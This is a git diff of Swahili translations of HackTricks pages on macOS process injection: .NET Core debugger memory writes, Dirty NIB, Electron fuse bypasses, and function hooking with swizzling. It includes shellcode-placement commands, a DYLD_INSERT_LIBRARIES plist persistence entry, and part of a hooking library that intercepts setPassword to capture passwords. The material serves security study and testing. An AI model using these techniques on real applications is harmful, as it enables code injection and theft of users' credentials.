**Hii ni muhtasari wa posti [https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/](https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/). Angalia kwa maelezo zaidi!**
**Hii ni muhtasari wa chapisho [https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/](https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/). Angalia kwa maelezo zaidi!**
## .NET Core Debugging <a href="#net-core-debugging" id="net-core-debugging"></a>
@ -54,7 +54,7 @@ read(rd, &sReceiveHeader, sizeof(MessageHeader));
```
## Kusoma Kumbukumbu
Mara tu kikao cha ufuatiliaji kimeanzishwa, kumbukumbu inaweza kusomwa kwa kutumia aina ya ujumbe [`MT_ReadMemory`](https://github.com/dotnet/runtime/blob/f3a45a91441cf938765bafc795cbf4885cad8800/src/coreclr/src/debug/shared/dbgtransportsession.cpp#L1896). Kazi readMemory inaelezewa kwa undani, ikifanya hatua zinazohitajika kutuma ombi la kusoma na kupata jibu:
Mara tu kikao cha ufuatiliaji kimeanzishwa, kumbukumbu inaweza kusomwa kwa kutumia ujumbe wa [`MT_ReadMemory`](https://github.com/dotnet/runtime/blob/f3a45a91441cf938765bafc795cbf4885cad8800/src/coreclr/src/debug/shared/dbgtransportsession.cpp#L1896) aina. Kazi readMemory inaelezewa kwa undani, ikifanya hatua zinazohitajika kutuma ombi la kusoma na kupata jibu:
```c
bool readMemory(void *addr, int len, unsigned char **output) {
// Allocation and initialization
@ -66,7 +66,7 @@ bool readMemory(void *addr, int len, unsigned char **output) {
return true;
}
```
Dhibitisho kamili la dhana (POC) linapatikana [hapa](https://gist.github.com/xpn/95eefc14918998853f6e0ab48d9f7b0b).
Uthibitisho kamili wa dhana (POC) upo [hapa](https://gist.github.com/xpn/95eefc14918998853f6e0ab48d9f7b0b).
## Kuandika Kumbukumbu
@ -91,11 +91,11 @@ Ili kutekeleza msimbo, mtu anahitaji kubaini eneo la kumbukumbu lenye ruhusa za
vmmap -pages [pid]
vmmap -pages 35829 | grep "rwx/rwx"
```
Kupata mahali pa kubadilisha kiashiria cha kazi ni muhimu, na katika .NET Core, hii inaweza kufanywa kwa kulenga **Dynamic Function Table (DFT)**. Meza hii, iliyoelezewa katika [`jithelpers.h`](https://github.com/dotnet/runtime/blob/6072e4d3a7a2a1493f514cdf4be75a3d56580e84/src/coreclr/src/inc/jithelpers.h), inatumika na runtime kwa kazi za msaada wa JIT compilation.
Kupata mahali pa kubadilisha kiashiria cha kazi ni muhimu, na katika .NET Core, hii inaweza kufanywa kwa kulenga **Dynamic Function Table (DFT)**. Meza hii, iliyoelezwa katika [`jithelpers.h`](https://github.com/dotnet/runtime/blob/6072e4d3a7a2a1493f514cdf4be75a3d56580e84/src/coreclr/src/inc/jithelpers.h), inatumika na runtime kwa kazi za msaada wa JIT compilation.
Kwa mifumo ya x64, utafutaji wa saini unaweza kutumika kupata rejeleo kwa alama `_hlpDynamicFuncTable` katika `libcorclr.dll`.
Kazi ya debugger `MT_GetDCB` inatoa taarifa muhimu, ikiwa ni pamoja na anwani ya kazi ya msaada, `m_helperRemoteStartAddr`, ikionyesha mahali pa `libcorclr.dll` katika kumbukumbu ya mchakato. Anwani hii kisha inatumika kuanza utafutaji wa DFT na kubadilisha kiashiria cha kazi na anwani ya shellcode.
Kazi ya debuggger `MT_GetDCB` inatoa taarifa muhimu, ikiwa ni pamoja na anwani ya kazi ya msaada, `m_helperRemoteStartAddr`, ikionyesha mahali pa `libcorclr.dll` katika kumbukumbu ya mchakato. Anwani hii kisha inatumika kuanza utafutaji wa DFT na kubadilisha kiashiria cha kazi na anwani ya shellcode.
Msimbo kamili wa POC kwa sindano katika PowerShell unapatikana [hapa](https://gist.github.com/xpn/b427998c8b3924ab1d63c89d273734b6).

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.md
View File

@ -8,7 +8,7 @@ Vivinjari vinavyotegemea Chromium kama Google Chrome, Microsoft Edge, Brave, na
#### `--load-extension` Flag
Lipu la `--load-extension` linatumika wakati wa kuanzisha kivinjari kinachotegemea Chromium kutoka kwa mstari wa amri au skripti. Lipu hili linaruhusu **kuongeza moja au zaidi ya nyongeza** kwenye kivinjari wakati wa kuanzishwa.
Lipu la `--load-extension` linatumika wakati wa kuanzisha kivinjari kinachotegemea Chromium kutoka kwa mstari wa amri au skripti. Lipu hili linaruhusu **kuongeza moja au zaidi ya nyongeza** kwenye kivinjari wakati wa kuanzisha.
#### `--use-fake-ui-for-media-stream` Flag

14
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md
View File

@ -2,22 +2,22 @@
{{#include ../../../banners/hacktricks-training.md}}
**Kwa maelezo zaidi kuhusu mbinu hii angalia chapisho la asili kutoka:** [**https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/) na chapisho linalofuata na [**https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/**](https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/)**.** Hapa kuna muhtasari:
**Kwa maelezo zaidi kuhusu mbinu hii angalia chapisho la asili kutoka:** [**https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/) na chapisho linalofuata kutoka [**https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/**](https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/)**.** Hapa kuna muhtasari:
### Nini Nib files
Nib (fupi kwa NeXT Interface Builder) files, sehemu ya mfumo wa maendeleo wa Apple, zinakusudia kufafanua **vipengele vya UI** na mwingiliano wao katika programu. Zinajumuisha vitu vilivyopangwa kama vile madirisha na vifungo, na hupakuliwa wakati wa wakati wa utekelezaji. Licha ya matumizi yao yaendelea, Apple sasa inashauri Storyboards kwa ajili ya uonyeshaji wa mtiririko wa UI wa kina zaidi.
Nib (fupi kwa NeXT Interface Builder) files, sehemu ya mfumo wa maendeleo wa Apple, zinakusudia kufafanua **vipengele vya UI** na mwingiliano wao katika programu. Zinajumuisha vitu vilivyopangwa kama vile madirisha na vifungo, na hupakiwa wakati wa utendaji. Licha ya matumizi yao yaendelea, Apple sasa inapendekeza Storyboards kwa ajili ya uonyeshaji wa mtiririko wa UI wa kina zaidi.
Faili kuu ya Nib inarejelea katika thamani **`NSMainNibFile`** ndani ya faili ya `Info.plist` ya programu na inapakuliwa na kazi **`NSApplicationMain`** inayotekelezwa katika kazi ya `main` ya programu.
Faili kuu ya Nib inarejelea katika thamani **`NSMainNibFile`** ndani ya faili ya `Info.plist` ya programu na hupakiwa na kazi **`NSApplicationMain`** inayotekelezwa katika kazi ya `main` ya programu.
### Mchakato wa Uingizaji wa Dirty Nib
#### Kuunda na Kuweka Faili ya NIB
#### Kuunda na Kuweka NIB File
1. **Mipangilio ya Awali**:
- Unda faili mpya ya NIB kwa kutumia XCode.
- Ongeza Kitu kwenye interface, ukipanga darasa lake kuwa `NSAppleScript`.
- Sanidi mali ya awali ya `source` kupitia Sifa za Wakati wa Uendeshaji Zilizofanywa na Mtumiaji.
- Sanidi mali ya awali ya `source` kupitia Sifa za Runtime Zilizofafanuliwa na Mtumiaji.
2. **Gadget ya Utekelezaji wa Kanuni**:
- Mipangilio inarahisisha kuendesha AppleScript kwa mahitaji.
- Jumuisha kifungo ili kuamsha kitu cha `Apple Script`, hasa kuanzisha mteule wa `executeAndReturnError:`.
@ -48,13 +48,13 @@ display dialog theDialogText
### Mfano wa Kanuni: Faili ya .xib Mbaya
- Fikia na kagua [**mfano wa faili mbaya ya .xib**](https://gist.github.com/xpn/16bfbe5a3f64fedfcc1822d0562636b4) inayodhihirisha kuendesha kanuni zisizo na mipaka.
- Fikia na kagua [**mfano wa faili ya .xib mbaya**](https://gist.github.com/xpn/16bfbe5a3f64fedfcc1822d0562636b4) inayodhihirisha utekelezaji wa kanuni zisizo na mipaka.
### Mfano Mwingine
Katika chapisho [https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/](https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/) unaweza kupata mafunzo juu ya jinsi ya kuunda nib mbaya.&#x20;
### Kushughulikia Vikwazo vya Uzinduzi
### Kukabiliana na Vikwazo vya Uzinduzi
- Vikwazo vya Uzinduzi vinakwamisha utekelezaji wa programu kutoka maeneo yasiyotarajiwa (mfano, `/tmp`).
- Inawezekana kubaini programu ambazo hazijalindwa na Vikwazo vya Uzinduzi na kuzilenga kwa ajili ya uingizaji wa faili ya NIB.

14
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
View File

@ -13,13 +13,13 @@ Mbinu hizi zitaongelewa baadaye, lakini katika nyakati za hivi karibuni Electron
- **`RunAsNode`**: Ikiwa imezimwa, inazuia matumizi ya env var **`ELECTRON_RUN_AS_NODE`** kuingiza nambari.
- **`EnableNodeCliInspectArguments`**: Ikiwa imezimwa, parameta kama `--inspect`, `--inspect-brk` hazitazingatiwa. Kuepusha njia hii ya kuingiza nambari.
- **`EnableEmbeddedAsarIntegrityValidation`**: Ikiwa imewezeshwa, **`asar`** **faili** iliyoloadi itathibitishwa na macOS. **Kuzuia** njia hii **kuingiza nambari** kwa kubadilisha maudhui ya faili hii.
- **`OnlyLoadAppFromAsar`**: Ikiwa hii imewezeshwa, badala ya kutafuta ku-load kwa mpangilio ufuatao: **`app.asar`**, **`app`** na hatimaye **`default_app.asar`**. Itakagua tu na kutumia app.asar, hivyo kuhakikisha kwamba wakati **imeunganishwa** na **`embeddedAsarIntegrityValidation`** fuse haiwezekani **kudhani nambari zisizo thibitishwa**.
- **`LoadBrowserProcessSpecificV8Snapshot`**: Ikiwa imewezeshwa, mchakato wa kivinjari unatumia faili inayoitwa `browser_v8_context_snapshot.bin` kwa snapshot yake ya V8.
- **`EnableEmbeddedAsarIntegrityValidation`**: Ikiwa imewezeshwa, **`asar`** **faili** iliyopakiwa itathibitishwa na macOS. **Kuzuia** njia hii **kuingiza nambari** kwa kubadilisha maudhui ya faili hii.
- **`OnlyLoadAppFromAsar`**: Ikiwa hii imewezeshwa, badala ya kutafuta kupakia kwa mpangilio ufuatao: **`app.asar`**, **`app`** na hatimaye **`default_app.asar`**. Itakagua na kutumia tu app.asar, hivyo kuhakikisha kwamba wakati **imeunganishwa** na **`embeddedAsarIntegrityValidation`** fuse haiwezekani **kudhani nambari zisizo thibitishwa**.
- **`LoadBrowserProcessSpecificV8Snapshot`**: Ikiwa imewezeshwa, mchakato wa kivinjari unatumia faili inayoitwa `browser_v8_context_snapshot.bin` kwa ajili ya snapshot yake ya V8.
Fuse nyingine ya kuvutia ambayo haitazuia kuingiza nambari ni:
- **EnableCookieEncryption**: Ikiwa imewezeshwa, duka la cookie kwenye diski linachakatwa kwa kutumia funguo za cryptography za kiwango cha OS.
- **EnableCookieEncryption**: Ikiwa imewezeshwa, duka la kuki kwenye diski linachakatwa kwa kutumia funguo za cryptography za kiwango cha OS.
### Checking Electron Fuses
@ -39,7 +39,7 @@ LoadBrowserProcessSpecificV8Snapshot is Disabled
```
### Kubadilisha Fuse za Electron
Kama [**nyaraka zinavyosema**](https://www.electronjs.org/docs/latest/tutorial/fuses#runasnode), usanidi wa **Fuse za Electron** umewekwa ndani ya **binary ya Electron** ambayo ina mahali fulani mfuatano wa **`dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX`**.
Kama [**nyaraka zinavyosema**](https://www.electronjs.org/docs/latest/tutorial/fuses#runasnode), usanidi wa **Fuse za Electron** umewekwa ndani ya **binary ya Electron** ambayo ina mahali fulani mfuatano wa herufi **`dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX`**.
Katika programu za macOS hii kwa kawaida iko katika `application.app/Contents/Frameworks/Electron Framework.framework/Electron Framework`
```bash
@ -52,7 +52,7 @@ Unaweza kupakia faili hii katika [https://hexed.it/](https://hexed.it/) na kutaf
Kumbuka kwamba ukijaribu **kuandika upya** **`Electron Framework` binary** ndani ya programu kwa kutumia bytes hizi zilizobadilishwa, programu hiyo haitafanya kazi.
## RCE kuongeza msimbo kwenye Programu za Electron
## RCE kuongeza msimbo kwa Programu za Electron
Kunaweza kuwa na **faili za nje za JS/HTML** ambazo Programu ya Electron inatumia, hivyo mshambuliaji anaweza kuingiza msimbo katika faili hizi ambazo saini yake haitakaguliwa na kutekeleza msimbo wa kiholela katika muktadha wa programu.
@ -194,7 +194,7 @@ Unaweza kutumia vibaya hii env variable katika plist ili kudumisha kudumu kwa ku
## Run non JS Code
Mbinu za awali zitakuruhusu kuendesha **msimbo wa JS ndani ya mchakato wa programu ya electron**. Hata hivyo, kumbuka kwamba **mchakato wa watoto unakimbia chini ya wasifu sawa wa sandbox** kama programu ya mzazi na **urithi wa ruhusa zao za TCC**.\
Mbinu za awali zitakuruhusu kuendesha **msimbo wa JS ndani ya mchakato wa programu ya electron**. Hata hivyo, kumbuka kwamba **mchakato wa watoto unakimbia chini ya wasifu sawa wa sandbox** kama programu ya mzazi na **unapata ruhusa zao za TCC**.\
Hivyo, ikiwa unataka kutumia haki za kuingia ili kufikia kamera au kipaza sauti kwa mfano, unaweza tu **kuendesha binary nyingine kutoka kwa mchakato**.
## Automatic Injection

28
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.md
View File

@ -78,11 +78,11 @@ DYLD_INSERT_LIBRARIES=./interpose2.dylib ./hello
Hello from interpose
```
> [!WARNING]
> Kigezo cha mazingira **`DYLD_PRINT_INTERPOSTING`** kinaweza kutumika kutatua matatizo ya interposing na kitaandika mchakato wa interpose.
> The **`DYLD_PRINT_INTERPOSTING`** env variable inaweza kutumika kutatua matatizo ya interposing na itachapisha mchakato wa interpose.
Pia kumbuka kwamba **interposing inatokea kati ya mchakato na maktaba zilizopakiwa**, haifanyi kazi na cache ya maktaba ya pamoja.
Pia kumbuka kwamba **interposing inatokea kati ya mchakato na maktaba zilizoloadiwa**, haifanyi kazi na cache ya maktaba ya pamoja.
### Interposing ya Kijani
### Dynamic Interposing
Sasa pia inawezekana kuingiza kazi kwa njia ya dynamic kwa kutumia kazi **`dyld_dynamic_interpose`**. Hii inaruhusu kuingiza kazi kwa programu wakati wa utekelezaji badala ya kufanya hivyo tu kutoka mwanzoni.
@ -106,7 +106,7 @@ Kitu ni **`someObject`**, njia ni **`@selector(method1p1:p2:)`** na hoja ni **va
Kufuata muundo wa vitu, inawezekana kufikia **array ya njia** ambapo **majina** na **viashiria** vya msimbo wa njia viko **pamoja**.
> [!CAUTION]
> Kumbuka kwamba kwa sababu njia na madarasa yanapatikana kulingana na majina yao, taarifa hii inahifadhiwa katika binary, hivyo inawezekana kuipata kwa `otool -ov </path/bin>` au [`class-dump </path/bin>`](https://github.com/nygard/class-dump)
> Kumbuka kwamba kwa sababu njia na madarasa yanaccessiwa kulingana na majina yao, taarifa hii inahifadhiwa katika binary, hivyo inawezekana kuipata kwa `otool -ov </path/bin>` au [`class-dump </path/bin>`](https://github.com/nygard/class-dump)
### Accessing the raw methods
@ -176,12 +176,12 @@ NSLog(@"Uppercase string: %@", uppercaseString3);
return 0;
}
```
### Method Swizzling na method_exchangeImplementations
### Method Swizzling with method_exchangeImplementations
Kazi **`method_exchangeImplementations`** inaruhusu **kubadilisha** **anwani** ya **utekelezaji** wa **kazi moja kwa nyingine**.
> [!CAUTION]
> Hivyo wakati kazi inaitwa kile kinachofanywa ni **kingine**.
> Hivyo wakati kazi inaitwa kile kinachokuwa **kinatekelezwa ni nyingine**.
```objectivec
//gcc -framework Foundation swizzle_str.m -o swizzle_str
@ -226,7 +226,7 @@ return 0;
}
```
> [!WARNING]
> Katika kesi hii ikiwa **kanuni ya utekelezaji ya halali** inachunguza **jina la mbinu** inaweza **gundua** hii swizzling na kuzuia isifanye kazi.
> Katika kesi hii ikiwa **kanuni ya utekelezaji ya halali** inakagua **jina la mbinu** inaweza **gundua** hii swizzling na kuzuia isifanye kazi.
>
> Mbinu ifuatayo haina kizuizi hiki.
@ -234,7 +234,7 @@ return 0;
Muundo wa awali ni wa ajabu kwa sababu unabadilisha utekelezaji wa mbinu 2 kutoka kwa nyingine. Kwa kutumia kazi **`method_setImplementation`** unaweza **kubadilisha** **utekelezaji** wa **mbinu kwa nyingine**.
Kumbuka tu **kuhifadhi anwani ya utekelezaji wa ile ya awali** ikiwa unakusudia kuitwa kutoka kwa utekelezaji mpya kabla ya kuandika tena kwa sababu baadaye itakuwa ngumu zaidi kupata anwani hiyo.
Kumbuka tu **kuhifadhi anwani ya utekelezaji wa ile ya asili** ikiwa unakusudia kuitwa kutoka kwa utekelezaji mpya kabla ya kuandika juu yake kwa sababu baadaye itakuwa ngumu zaidi kupata anwani hiyo.
```objectivec
#import <Foundation/Foundation.h>
#import <objc/runtime.h>
@ -290,13 +290,13 @@ return 0;
Katika ukurasa huu njia tofauti za kuhooki kazi zilijadiliwa. Hata hivyo, zilihusisha **kukimbia msimbo ndani ya mchakato ili kushambulia**.
Ili kufanya hivyo, mbinu rahisi zaidi ya kutumia ni kuingiza [Dyld kupitia mabadiliko ya mazingira au kuhamasisha](macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md). Hata hivyo, nadhani hii inaweza pia kufanywa kupitia [Dylib process injection](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port).
Ili kufanya hivyo, mbinu rahisi zaidi ya kutumia ni kuingiza [Dyld kupitia mabadiliko ya mazingira au hijacking](macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md). Hata hivyo, nadhani hii inaweza pia kufanywa kupitia [Dylib process injection](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port).
Hata hivyo, chaguo zote mbili ni **za mipaka** kwa **binaries/mchakato zisizo na ulinzi**. Angalia kila mbinu ili kujifunza zaidi kuhusu mipaka.
Hata hivyo, shambulio la kuhooki kazi ni maalum sana, mshambuliaji atafanya hivi ili **kuchukua taarifa nyeti kutoka ndani ya mchakato** (ikiwa sivyo ungeweza tu kufanya shambulio la kuingiza mchakato). Na taarifa hii nyeti inaweza kuwa katika programu zilizopakuliwa na mtumiaji kama MacPass.
Hata hivyo, shambulio la hooking la kazi ni maalum sana, mshambuliaji atafanya hivi ili **kuchukua taarifa nyeti kutoka ndani ya mchakato** (ikiwa sivyo ungeweza tu kufanya shambulio la kuingiza mchakato). Na taarifa hii nyeti inaweza kuwa katika programu zilizopakuliwa na mtumiaji kama MacPass.
Hivyo, njia ya mshambuliaji itakuwa ama kupata udhaifu au kuondoa saini ya programu, kuingiza **`DYLD_INSERT_LIBRARIES`** mabadiliko ya mazingira kupitia Info.plist ya programu kwa kuongeza kitu kama:
Hivyo, njia ya mshambuliaji itakuwa ama kupata udhaifu au kuondoa saini ya programu, kuingiza **`DYLD_INSERT_LIBRARIES`** env variable kupitia Info.plist ya programu kwa kuongeza kitu kama:
```xml
<key>LSEnvironment</key>
<dict>
@ -308,10 +308,10 @@ na kisha **re-register** programu hiyo:
```bash
/System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -f /Applications/Application.app
```
Ongeza katika maktaba hiyo msimbo wa hooking ili kutoa taarifa: Nywila, ujumbe...
Ongeza katika maktaba hiyo msimbo wa hooking ili kuhamasisha taarifa: Nywila, ujumbe...
> [!CAUTION]
> Kumbuka kwamba katika matoleo mapya ya macOS ikiwa **unafuta saini** ya binary ya programu na ilikuwa imefanywa kazi hapo awali, macOS **haitakuwa ikifanya kazi programu hiyo** tena.
> Kumbuka kwamba katika matoleo mapya ya macOS ikiwa **unafuta saini** ya binary ya programu na ilikuwa imefanywa awali, macOS **haitakuwa ikitekeleza programu** tena.
#### Mfano wa maktaba
```objectivec
@ -349,7 +349,7 @@ IMP fake_IMP = (IMP)custom_setPassword;
real_setPassword = method_setImplementation(real_Method, fake_IMP);
}
```
## Marejeleo
## Marejeo
- [https://nshipster.com/method-swizzling/](https://nshipster.com/method-swizzling/)

102
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md
View File

@ -6,7 +6,7 @@
### Taarifa za Msingi
Mach inatumia **tasks** kama **kitengo kidogo zaidi** cha kushiriki rasilimali, na kila task inaweza kuwa na **nyuzi nyingi**. **Tasks na nyuzi hizi zimepangwa 1:1 kwa mchakato wa POSIX na nyuzi**.
Mach inatumia **tasks** kama **kitengo kidogo zaidi** cha kushiriki rasilimali, na kila task inaweza kuwa na **nyuzi nyingi**. **Tasks na nyuzi hizi zimepangwa 1:1 kwa michakato na nyuzi za POSIX**.
Mawasiliano kati ya tasks hufanyika kupitia Mawasiliano ya Kati ya Mchakato ya Mach (IPC), ikitumia njia za mawasiliano za upande mmoja. **Ujumbe unahamishwa kati ya bandari**, ambazo zinafanya kazi kama **foleni za ujumbe** zinazodhibitiwa na kernel.
@ -29,9 +29,9 @@ Haki za bandari, ambazo zinaelezea ni shughuli zipi task inaweza kufanya, ni muh
- **Haki ya Kutuma-mara moja**, ambayo inaruhusu kutuma ujumbe mmoja kwa bandari na kisha inatoweka.
- Haki hii **haiwezi** **kuigwa**, lakini inaweza **kuhamishwa**.
- **Haki ya Seti ya Bandari**, ambayo inaashiria _seti ya bandari_ badala ya bandari moja. Kuondoa ujumbe kutoka kwa seti ya bandari kunamaanisha kuondoa ujumbe kutoka kwa moja ya bandari inazozishikilia. Seti za bandari zinaweza kutumika kusikiliza kwenye bandari kadhaa kwa wakati mmoja, kama `select`/`poll`/`epoll`/`kqueue` katika Unix.
- **Jina la Kufa**, ambalo si haki halisi ya bandari, bali ni mahali pa kuweka tu. Wakati bandari inaharibiwa, haki zote zilizopo za bandari kwa bandari hiyo zinageuka kuwa majina ya kufa.
- **Jina la Kufa**, ambalo si haki halisi ya bandari, bali ni mahali pa kuweka. Wakati bandari inaharibiwa, haki zote zilizopo za bandari kwa bandari hiyo zinageuka kuwa majina ya kufa.
**Tasks zinaweza kuhamisha Haki za KUTUMA kwa wengine**, na kuwapa uwezo wa kutuma ujumbe nyuma. **Haki za KUTUMA pia zinaweza kuigwa, hivyo task inaweza kuiga na kutoa haki hiyo kwa task ya tatu**. Hii, pamoja na mchakato wa kati unaojulikana kama **bootstrap server**, inaruhusu mawasiliano bora kati ya tasks.
**Tasks zinaweza kuhamisha haki za KUTUMA kwa wengine**, na kuwapa uwezo wa kutuma ujumbe nyuma. **Haki za KUTUMA pia zinaweza kuigwa, hivyo task inaweza kuiga na kutoa haki hiyo kwa task ya tatu**. Hii, pamoja na mchakato wa kati unaojulikana kama **bootstrap server**, inaruhusu mawasiliano bora kati ya tasks.
### Bandari za Faili
@ -41,27 +41,27 @@ Bandari za faili zinaruhusu kufunga viashiria vya faili katika bandari za Mac (k
Kama ilivyotajwa hapo awali, inawezekana kutuma haki kwa kutumia ujumbe za Mach, hata hivyo, **huwezi kutuma haki bila tayari kuwa na haki** ya kutuma ujumbe wa Mach. Hivyo, mawasiliano ya kwanza yanaanzishwa vipi?
Kwa hili, **bootstrap server** (**launchd** katika mac) inahusika, kwani **kila mtu anaweza kupata Haki ya KUTUMA kwa bootstrap server**, inawezekana kuomba haki ya kutuma ujumbe kwa mchakato mwingine:
Kwa hili, **bootstrap server** (**launchd** katika mac) inahusika, kwani **kila mtu anaweza kupata haki ya KUTUMA kwa bootstrap server**, inawezekana kuomba haki ya kutuma ujumbe kwa mchakato mwingine:
1. Task **A** inaunda **bandari mpya**, ikipata **Haki ya KUPOKEA** juu yake.
2. Task **A**, ikiwa ni mmiliki wa Haki ya KUPOKEA, **inaunda Haki ya KUTUMA kwa bandari**.
3. Task **A** inaweka **kiunganishi** na **bootstrap server**, na **inatumia Haki ya KUTUMA** kwa bandari ambayo ilizalisha mwanzoni.
- Kumbuka kwamba mtu yeyote anaweza kupata Haki ya KUTUMA kwa bootstrap server.
3. Task **A** inaweka **kiunganishi** na **bootstrap server**, na **inaituma Haki ya KUTUMA** kwa bandari ambayo ilizalisha mwanzoni.
- Kumbuka kwamba mtu yeyote anaweza kupata haki ya KUTUMA kwa bootstrap server.
4. Task A inatuma ujumbe wa `bootstrap_register` kwa bootstrap server ili **kuunganisha bandari iliyotolewa na jina** kama `com.apple.taska`
5. Task **B** inashirikiana na **bootstrap server** ili kutekeleza **kuangalia huduma** jina (`bootstrap_lookup`). Ili bootstrap server iweze kujibu, task B itatumia **Haki ya KUTUMA kwa bandari ambayo ilizalisha hapo awali** ndani ya ujumbe wa kuangalia. Ikiwa kuangalia ni ya mafanikio, **server inagundua Haki ya KUTUMA** iliyopokelewa kutoka Task A na **kuhamasisha kwa Task B**.
- Kumbuka kwamba mtu yeyote anaweza kupata Haki ya KUTUMA kwa bootstrap server.
6. Kwa Haki hii ya KUTUMA, **Task B** ina uwezo wa **kutuma** **ujumbe** **kwa Task A**.
7. Kwa mawasiliano ya pande mbili kawaida task **B** inaunda bandari mpya yenye **Haki ya KUPOKEA** na **Haki ya KUTUMA**, na inampa **Haki ya KUTUMA kwa Task A** ili iweze kutuma ujumbe kwa TASK B (mawasiliano ya pande mbili).
5. Task **B** inashirikiana na **bootstrap server** ili kutekeleza **kuangalia bootstrap kwa jina la huduma** (`bootstrap_lookup`). Ili bootstrap server iweze kujibu, task B itaituma **Haki ya KUTUMA kwa bandari ambayo ilizalisha awali** ndani ya ujumbe wa kuangalia. Ikiwa kuangalia kunafanikiwa, **server inagundua Haki ya KUTUMA** iliyopokelewa kutoka Task A na **kuhamasisha kwa Task B**.
- Kumbuka kwamba mtu yeyote anaweza kupata haki ya KUTUMA kwa bootstrap server.
6. Kwa haki hii ya KUTUMA, **Task B** ina uwezo wa **kutuma** **ujumbe** **kwa Task A**.
7. Kwa mawasiliano ya pande mbili, kawaida task **B** inaunda bandari mpya yenye **Haki ya KUPOKEA** na **Haki ya KUTUMA**, na inampa **Haki ya KUTUMA kwa Task A** ili iweze kutuma ujumbe kwa TASK B (mawasiliano ya pande mbili).
Bootstrap server **haiwezi kuthibitisha** jina la huduma linalodaiwa na task. Hii inamaanisha task **inaweza kujaribu kujifanya kama task yoyote ya mfumo**, kama kudai kwa uwongo **jina la huduma ya idhini** na kisha kuidhinisha kila ombi.
Bootstrap server **haiwezi kuthibitisha** jina la huduma linalodaiwa na task. Hii inamaanisha **task** inaweza kwa urahisi **kujifanya kama task yoyote ya mfumo**, kama kudai kwa uwongo jina la huduma ya idhini na kisha kuidhinisha kila ombi.
Kisha, Apple inahifadhi **majina ya huduma zinazotolewa na mfumo** katika faili za usanidi salama, zilizoko katika **directories zilizolindwa na SIP**: `/System/Library/LaunchDaemons` na `/System/Library/LaunchAgents`. Pamoja na kila jina la huduma, **binary inayohusiana pia inahifadhiwa**. Bootstrap server, itaunda na kushikilia **Haki ya KUPOKEA kwa kila moja ya majina haya ya huduma**.
Kwa huduma hizi zilizopangwa, **mchakato wa kuangalia unabadilika kidogo**. Wakati jina la huduma linatafutwa, launchd inaanzisha huduma hiyo kwa njia ya kidijitali. Mchakato mpya ni kama ifuatavyo:
- Task **B** inaanzisha **kuangalia** kwa jina la huduma.
- Task **B** inaanzisha **kuangalia bootstrap** kwa jina la huduma.
- **launchd** inakagua ikiwa task inafanya kazi na ikiwa haifanyi, **inaanzisha**.
- Task **A** (huduma) inafanya **kuangalia kuingia** (`bootstrap_check_in()`). Hapa, **bootstrap** server inaunda Haki ya KUTUMA, inashikilia na **kuhamasisha Haki ya KUPOKEA kwa Task A**.
- Task **A** (huduma) inafanya **kuangalia bootstrap** (`bootstrap_check_in()`). Hapa, **bootstrap** server inaunda Haki ya KUTUMA, inashikilia na **kuhamasisha Haki ya KUPOKEA kwa Task A**.
- launchd inagundua **Haki ya KUTUMA na kupeleka kwa Task B**.
- Task **B** inaunda bandari mpya yenye **Haki ya KUPOKEA** na **Haki ya KUTUMA**, na inampa **Haki ya KUTUMA kwa Task A** (svc) ili iweze kutuma ujumbe kwa TASK B (mawasiliano ya pande mbili).
@ -85,15 +85,15 @@ mach_port_name_t msgh_voucher_port;
mach_msg_id_t msgh_id;
} mach_msg_header_t;
```
Mchakato unaomiliki _**receive right**_ unaweza kupokea ujumbe kwenye bandari ya Mach. Kinyume chake, **senders** wanapewa _**send**_ au _**send-once right**_. Haki ya kutuma mara moja ni ya kutuma ujumbe mmoja tu, baada ya hapo inakuwa batili.
Mchakato unaomiliki _**receive right**_ unaweza kupokea ujumbe kwenye bandari ya Mach. Kinyume chake, **watumaji** wanapewa _**send**_ au _**send-once right**_. Haki ya kutuma mara moja ni ya kutuma ujumbe mmoja tu, baada ya hapo inakuwa batili.
Sehemu ya awali **`msgh_bits`** ni bitmap:
Sehemu ya awali **`msgh_bits`** ni picha ya bitmap:
- Bit ya kwanza (iliyokuwa na umuhimu zaidi) inatumika kuashiria kwamba ujumbe ni mgumu (zaidi juu ya hili hapa chini)
- Bit ya kwanza (iliyokuwa na umuhimu zaidi) inatumika kuashiria kwamba ujumbe ni mgumu (zaidi juu ya hii hapa chini)
- Bit ya 3 na 4 zinatumika na kernel
- **Bit 5 zenye umuhimu mdogo zaidi za byte ya 2** zinaweza kutumika kwa **voucher**: aina nyingine ya bandari ya kutuma mchanganyiko wa funguo/thamani.
- **Bit 5 zenye umuhimu mdogo zaidi za byte ya 3** zinaweza kutumika kwa **local port**
- **Bit 5 zenye umuhimu mdogo zaidi za byte ya 4** zinaweza kutumika kwa **remote port**
- **Bit 5 zisizo na umuhimu zaidi za byte ya 2** zinaweza kutumika kwa **voucher**: aina nyingine ya bandari kutuma mchanganyiko wa funguo/thamani.
